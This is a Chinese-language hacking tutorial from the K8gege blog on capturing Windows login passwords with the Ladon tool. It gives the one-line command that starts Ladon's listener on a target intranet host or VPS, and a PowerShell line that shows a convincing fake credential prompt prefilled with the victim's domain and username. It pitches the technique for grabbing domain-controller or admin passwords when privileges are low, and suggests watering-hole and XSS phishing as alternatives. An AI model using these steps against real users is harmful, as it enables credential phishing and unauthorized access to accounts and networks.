〖教程〗使用Ladon捕获Windonws登陆密码
本文于 1727 天之前发表
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
版本
>= Ladon 6.6.3
Update: 20200618
原理
使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。
应用场景
域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)
Ladon监听
该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html
1 | Ladon Web 800 |
PowerShell
执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。
1 | $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName); |
工具下载
最新版本:http://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈